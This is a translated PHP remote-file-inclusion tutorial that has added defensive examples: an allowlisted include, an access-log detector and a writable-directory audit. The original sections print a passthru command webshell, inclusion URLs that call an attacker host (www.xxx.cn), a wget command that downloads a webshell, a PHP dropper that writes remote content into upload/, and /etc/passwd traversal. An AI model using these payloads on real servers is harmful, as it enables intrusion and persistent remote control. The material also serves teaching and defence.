Author: m4r10 (http://hi.baidu.com/m4r10). Please credit the source when reprinting.
Remote File Inclusion Vulnerabilities
I. What is a "Remote File Inclusion vulnerability"?
The answer: when a server-side script uses a PHP include function to pull in a file, and the source of the file to be included is not strictly filtered, the script can be made to include a malicious file. We can construct that malicious file ourselves to achieve our own purposes.
Dangerous functions involved: include(), require(), include_once(), require_once()
include: includes and runs the specified file. If an error occurs in the included external file, PHP issues a warning, but the rest of the including PHP file continues to execute.
require: the only difference from include is what happens when an error occurs: under include the script keeps running, under require it stops.
include_once: works almost the same as include, but before including the file it checks whether the file has already been included; if it has, it is not included again.
require_once: differs from require in the same way that include_once differs from include, so I won't repeat it.
php.ini configuration: with allow_url_fopen = Off, remote files cannot be included. The vulnerability exists both remotely and locally in PHP 4, but only locally in PHP 5.
II. Why file inclusion?
When programmers write programs, they do not like to write the same code (for example, some common functions) several times. So the shared code is put in a separate file, say share.php, and then included from the other files. In PHP, the functions listed above are used for this. The workflow is: in a file that needs share.php, I write include("share.php"), and from then on the functions in share.php can be used. When the file name is hard-coded like this, there is no problem and no vulnerability. So where exactly is the problem?
Sometimes you may not know in advance which file to include. For example, look at the following index.php:
CODE:
---------------------------------------------------------------------------------------------------
<?php
if (!empty($_GET['page'])) {
    include $_GET['page'];
} else {
    include "home.php";
}
?>
---------------------------------------------------------------------------------------------------
This is a perfectly ordinary piece of PHP code. How does it work?
The URLs used with the code above look like this:
http://hi.baidu.com/m4r10/php/index.php?page=main.php or
http://hi.baidu.com/m4r10/php/index.php?page=downloads.php
Based on the code above, here is briefly how it works:
1. The URL above is requested, and index.php obtains the value of page ($_GET['page']).
2. It checks whether $_GET['page'] is empty. If it is not empty (main.php here), it uses include to include that file.
3. If $_GET['page'] is empty, the else branch runs and includes the file "home.php".
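The fix a defender wants for the index.php above is to stop handing the raw page value to include at all. The following hardened replacement is an added example written for this edit, not code from m4r10's post; the page names main/downloads/home, the pages/ subdirectory and the PAGE_MAP constant are assumptions. It maps the URL value to a file through an allowlist, checks with realpath that the resolved file still sits under the pages directory (so the ../ jumps and absolute paths discussed later under section IV cannot reach include), and refuses to run at all if allow_url_include (introduced in PHP 5.2, Off by default) has been switched on.

```php
<?php
// Added example, not from the original post: hardened replacement for the
// index.php shown above. Page names, PAGES_DIR and PAGE_MAP are assumptions.
declare(strict_types=1);

// Allowlist: URL value => file on disk. Nothing outside this map is ever included.
const PAGE_MAP = [
    'main'      => 'main.php',
    'downloads' => 'downloads.php',
    'home'      => 'home.php',
];

// Directory holding the includable pages (assumed layout).
define('PAGES_DIR', __DIR__ . '/pages');

/**
 * Resolve a user-supplied page key to an absolute path inside PAGES_DIR.
 * Returns null for anything not on the allowlist or not under that directory,
 * so a URL, a ../ sequence or /etc/passwd can never reach include().
 */
function resolve_page($key): ?string
{
    if ($key === null || $key === '') {
        $key = 'home';                        // same default as the original else branch
    }
    if (!is_string($key) || !array_key_exists($key, PAGE_MAP)) {
        return null;                          // arrays (page[]=x) or unknown keys: reject
    }
    $base = realpath(PAGES_DIR);
    $path = realpath(PAGES_DIR . '/' . PAGE_MAP[$key]);
    if ($base === false || $path === false) {
        return null;                          // file missing: fail closed, never guess
    }
    // Defense in depth: the canonical path must still start with the pages directory.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// This site never needs URL includes; refuse to run if the ini setting is on.
if (filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN)) {
    http_response_code(500);
    exit('allow_url_include must be Off');
}

$page = resolve_page($_GET['page'] ?? null);
if ($page === null) {
    http_response_code(404);
    exit('Unknown page');                     // generic message; never echo the input back
}
include $page;
```

Note that allow_url_fopen = Off (the setting the post mentions) and allow_url_include = Off only stop remote inclusion; local inclusion of /etc/passwd or of a ../ path is unaffected by either, which is why the allowlist and the realpath check do the real work here.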
III. Why is there a vulnerability?
You may say this is fine: it is very convenient to include files dynamically according to the URL, so how can it cause a vulnerability? The answer is that we are not so well-behaved. We like to be different from others and will not follow the links he provides; we may want to include (call) a file of our own choosing, for example by entering a URL like http://hi.baidu.com/m4r10/php/index.php?page=hello.php. Our index.php then obediently follows the steps above: it gets page as hello.php and calls include(hello.php). Now the problem appears: since there is no hello.php, the include produces a warning similar to the following:
Quote:
Warning: include(hello.php) [function.include]: failed to open stream: No such file or directory in /vhost/wwwroot/php/index.php on line 3
Warning: include() [function.include]: Failed opening 'hello.php' for inclusion (include_path='.:') in /vhost/wwwroot/php/index.php on line 3
Note that the first warning says the specified hello.php cannot be found, that is, there is no such file at the given path. The second warning follows from the first: because the file was not found, the inclusion failed, and a warning is given for that as well.
IV. How is it exploited?
As we saw above, there is a problem. So how can such a vulnerability be exploited? There are actually many exploitation methods, but they are essentially similar. Here I will describe three common ones:
1. Including and reading other files on the target machine
As we saw above, because the page parameter is not filtered, we can specify any other sensitive file on the target host. For example, the warning above exposes the absolute path (/vhost/wwwroot/php/), so we can probe repeatedly to include other files. Specifying the URL http://hi.baidu.com/m4r10/php/index.php?page=./txt.txt reads txt.txt from the current directory; ../../ jumps between directories (if ../ is not filtered); and an absolute path can be given directly to read sensitive system files, for example http://hi.baidu.com/m4r10/php/index.php?page=/etc/passwd. If the target host does not restrict permissions strictly, or Apache runs with relatively high privileges, the content of that file is returned; otherwise a warning similar to "open_basedir restriction in effect." is returned.
2. Remotely including a runnable PHP Trojan
If allow_url_fopen is on for the target host, we can remotely include a file like the one below. It can be saved under any suffix; the suffix is not important, as long as the content is PHP.
CODE:
--------------------------------------------------------------------------------
<?php
if (get_magic_quotes_gpc()) {
    $_REQUEST["cmd"] = stripslashes($_REQUEST["cmd"]); // remove the escaping backslashes added by magic quotes
}
ini_set("max_execution_time", 0); // execution time limit for this file; 0 means unlimited
echo "M4R10 start line"; // marker printed before the output
passthru($_REQUEST["cmd"]); // run the command given in cmd
echo "M4R10 end line"; // marker printed after the output
?>
--------------------------------------------------------------------------------
The file above accepts the command given in cmd and calls passthru to run it; the output is returned between the "M4R10 start line" and "M4R10 end line" markers. Save this file on a server we control (it can be a host that does not support PHP itself), as long as it can be fetched over HTTP, for example at http://www.xxx.cn/developer.txt. Then request http://hi.baidu.com/m4r10/php/index.php?page=http://www.xxx.cn/developer.txt?cmd=ls, where cmd is followed by the command you need to execute. Other commonly used commands (taking *UNIX as the example) are:
Quote:
ls: list directories and files (equivalent to dir on Windows)
pwd: show the current absolute path
id / whoami: show the current user
wget: download the file at the given URL
and so on; look the others up on Baidu.
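From the defender's side, the requests described in sections 1 and 2 leave a recognisable trace in the web server's access log: a file-name parameter carrying a URL, a ../ sequence, or an absolute OS path. The script below is an added example written for this edit, not part of m4r10's post; the log lines it scans are constructed to mirror the URLs quoted above, and the parameter names, the indicator labels and the path prefixes it flags are assumptions to tune for a real site.

```php
<?php
// Added example, not from the original post: flag access-log requests that carry
// the inclusion patterns described in sections 1 and 2. The log lines are constructed.
declare(strict_types=1);

// Constructed sample lines in Apache common-log style.
const SAMPLE_LOG = <<<'LOG'
10.0.0.5 - - [01/Jan/2010:10:00:01 +0000] "GET /php/index.php?page=main.php HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2010:10:00:02 +0000] "GET /php/index.php?page=../../../../etc/passwd HTTP/1.1" 200 1024
10.0.0.9 - - [01/Jan/2010:10:00:03 +0000] "GET /php/index.php?page=http://www.xxx.cn/developer.txt?cmd=ls HTTP/1.1" 200 2048
10.0.0.9 - - [01/Jan/2010:10:00:04 +0000] "GET /php/index.php?page=%2Fetc%2Fpasswd HTTP/1.1" 200 1024
10.0.0.7 - - [01/Jan/2010:10:00:05 +0000] "GET /php/index.php?page=downloads.php HTTP/1.1" 200 600
LOG;

/**
 * Return the indicator names found in one log line (empty array when clean).
 * Every query parameter is checked, not only "page", because the vulnerable
 * parameter name differs from application to application.
 */
function inclusion_indicators(string $line): array
{
    if (!preg_match('/"(?:GET|POST) (\S+) HTTP\//', $line, $m)) {
        return [];
    }
    $q = strpos($m[1], '?');
    if ($q === false) {
        return [];
    }
    parse_str(substr($m[1], $q + 1), $params);   // URL-decodes each value once
    $found = [];
    foreach ($params as $name => $value) {
        if (!is_string($value)) {
            continue;                             // arrays (page[]=x) are not file names
        }
        $value = rawurldecode($value);            // also catch double-encoded payloads
        if (preg_match('#^[a-z][a-z0-9+.-]*://#i', $value)) {
            $found[] = "remote-url:$name";        // remote inclusion (section 2)
        }
        if (strpos($value, '../') !== false || strpos($value, '..\\') !== false) {
            $found[] = "traversal:$name";         // directory jump (section 1)
        }
        if (preg_match('#^/(etc|proc|var|usr|root|home)/#', $value)
            || preg_match('#^[a-z]:\\\\#i', $value)) {
            $found[] = "absolute-path:$name";     // OS path used as a file name (section 1)
        }
    }
    return $found;
}

/** Scan a whole log; returns [line number => indicators] for suspicious lines only. */
function scan_log(string $log): array
{
    $hits = [];
    foreach (explode("\n", trim($log)) as $i => $line) {
        $ind = inclusion_indicators($line);
        if ($ind !== []) {
            $hits[$i + 1] = $ind;
        }
    }
    return $hits;
}

if (PHP_SAPI === 'cli') {
    foreach (scan_log(SAMPLE_LOG) as $lineNo => $ind) {
        printf("line %d: %s\n", $lineNo, implode(', ', $ind));
    }
}
```

Run with php on the command line: lines 2, 3 and 4 of the constructed log are reported (traversal, remote-url and absolute-path respectively) and the two ordinary page requests stay silent. A 200 status on such a request, as in the sample, is the signal to look at most closely, since a fixed application would answer 404.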
3. Including a PHP file that creates a file
Some people may feel it is more reassuring to have a real Webshell on the target machine: if someone notices and fixes the vulnerability, we can no longer remotely include the "pseudo" Webshell above, right? We understand this mentality, so let's continue. To get a real Webshell there are again two common methods:
1) Use a command such as wget to download a Webshell
This is simple and often used. In the pseudo webshell above we can execute commands, so we can also call a very powerful tool on the system, wget. This command is powerful; you can find a lot of parameters with Google, and they will surely confuse you. Haha, we don't need anything so complicated; we only use -O (--output-document=FILE, write the document to FILE).
The prerequisite is that you put a Webshell containing PHP code somewhere reachable over HTTP or FTP, such as http://www.xxx.cn/m4r10.txt, with the webshell's content written in this file. Then request the following URL: http://hi.baidu.com/m4r10/php/index.php?page=http://www.xxx.cn/cmd.txt?cmd=wget http://www.xxx.cn/m4r10.txt -O m4r10.php. If the current directory is writable, you get a Webshell called m4r10.php; if the current directory is not writable, you have to think of other methods.
2) Create the file with a script
The wget approach may run into a current directory that cannot be written, or the command may be disabled (or not installed) on the target host, and we need to change approach again. We can combine the file inclusion vulnerability above with a PHP script that creates (writes) a file. Its content is as follows:
CODE:
--------------------------------------------------------------------------------------------------
<?php
$f = file_get_contents("http://www.xxx.cn/m4r10.txt"); // fetch the content at the given URL
$ff = fopen("./upload/m4r10.php", "a"); // find a writable directory and create a file there
fwrite($ff, $f); // write the fetched content into the created file
fclose($ff); // close and save the file
?>
--------------------------
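Both methods in section 3 depend on the same condition: a directory under the web root that the web server's user can write to and from which PHP files are executed. The audit script below is an added example written for this edit, not part of m4r10's post; it builds a small constructed web root in a temporary directory (an app/ directory made read-only and a writable upload/ directory, with file names that are assumptions) and then reports every PHP-executable file whose parent directory the current user could write, together with a SHA-256 that can be kept as a baseline.

```php
<?php
// Added example, not from the original post: find PHP files sitting in directories
// the current (web server) user can write to, which is the condition the file-writing
// script above relies on. The directory layout built below is constructed.
declare(strict_types=1);

/**
 * Walk $root and report every PHP-executable file whose parent directory is
 * writable by the user running this script. Returns [relative path => info].
 * Run it as the web server's user; as root, every directory looks writable.
 */
function php_files_in_writable_dirs(string $root): array
{
    $base = realpath($root);
    if ($base === false) {
        return [];
    }
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($base, FilesystemIterator::SKIP_DOTS)
    );
    $report = [];
    foreach ($it as $info) {
        if (!$info->isFile()) {
            continue;
        }
        // Extensions a typical Apache/php-fpm setup hands to the PHP engine.
        if (!preg_match('/\.(php|phtml|php[3-7]|phar)$/i', $info->getFilename())) {
            continue;
        }
        if (!is_writable($info->getPath())) {
            continue;                     // deploy directory: the web user could not have dropped it
        }
        $rel = substr($info->getPathname(), strlen($base) + 1);
        $report[$rel] = [
            'sha256' => hash_file('sha256', $info->getPathname()),
            'mtime'  => $info->getMTime(),
        ];
    }
    ksort($report);
    return $report;
}

/** Build a constructed web root: a read-only app/ directory and a writable upload/ directory. */
function build_sample_root(): string
{
    $root = sys_get_temp_dir() . '/rfi_audit_' . bin2hex(random_bytes(4));
    mkdir("$root/app", 0755, true);
    mkdir("$root/upload", 0777, true);
    file_put_contents("$root/app/index.php", "<?php echo 'app';\n");
    file_put_contents("$root/upload/photo.jpg", "not really a jpeg");
    file_put_contents("$root/upload/m4r10.php", "<?php /* constructed dropped file */\n");
    chmod("$root/app", 0555);             // simulate a deploy directory the web user cannot write
    return $root;
}

/** Remove the constructed tree again. */
function remove_tree(string $dir): void
{
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS),
        RecursiveIteratorIterator::CHILD_FIRST
    );
    foreach ($it as $info) {
        $info->isDir() ? rmdir($info->getPathname()) : unlink($info->getPathname());
    }
    rmdir($dir);
}

if (PHP_SAPI === 'cli') {
    $root = build_sample_root();
    foreach (php_files_in_writable_dirs($root) as $rel => $info) {
        printf("%s  sha256=%s  mtime=%d\n", $rel, $info['sha256'], $info['mtime']);
    }
    chmod("$root/app", 0755);             // make the tree removable again
    remove_tree($root);
}
```

Run as an ordinary user, only upload/m4r10.php is reported, because app/ was made read-only and photo.jpg is not a PHP extension. On a real site the same condition is better removed than audited: keep upload directories outside the document root or configure the server so that no file under them is handed to the PHP engine, and diff the report against a baseline after each deploy.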